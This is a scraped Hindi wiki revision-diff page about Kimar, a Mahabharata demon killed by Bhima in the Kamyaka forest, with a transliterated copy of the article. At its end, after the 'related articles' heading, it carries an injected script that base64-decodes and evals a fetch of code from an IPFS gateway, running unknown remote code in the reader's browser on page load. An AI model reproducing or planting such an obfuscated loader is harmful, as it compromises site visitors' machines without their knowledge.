Difference between revisions of "किमार"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''किमार''' महाभारत कालीन एक राक्षस था। 'महाभारत' में...' के साथ नया पृष्ठ बनाया)
 
 
Line 1: Line 1:
'''किमार''' महाभारत कालीन एक राक्षस था। '[[महाभारत]]' में [[सरस्वती नदी]] के तट पर स्थित [[काम्यकवन]] का उल्लेख मिलता है, जहाँ [[पांडव|पांडवों]] ने अपने वनवास काल का कुछ समय बिताया था। इसी वन में [[भीम|महाबली भीम]] ने किमार राक्षस का वध किया था।<ref>महाभारत वनपर्व 11</ref>  
+
'''किमार''' महाभारत कालीन एक राक्षस था। '[[महाभारत]]' में [[सरस्वती नदी]] के तट पर स्थित [[काम्यकवन]] का उल्लेख मिलता है, जहाँ [[पांडव|पांडवों]] ने अपने वनवास काल का कुछ समय बिताया था। इसी वन में [[भीम|महाबली भीम]] ने किमार राक्षस का वध किया था।<ref>महाभारत वनपर्व 11</ref>
  
 +
 +
{{seealso|काम्यवन|ब्रज|मथुरा}}
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक= प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक= प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}

Latest revision as of 05:53, 5 April 2016

kimar mahabharat kalin ek rakshas tha. 'mahabharat' mean sarasvati nadi ke tat par sthit kamyakavan ka ullekh milata hai, jahaan paandavoan ne apane vanavas kal ka kuchh samay bitaya tha. isi van mean mahabali bhim ne kimar rakshas ka vadh kiya tha.[1]


  1. REDIRECTsaancha:inhean bhi dekhean


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. mahabharat vanaparv 11

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>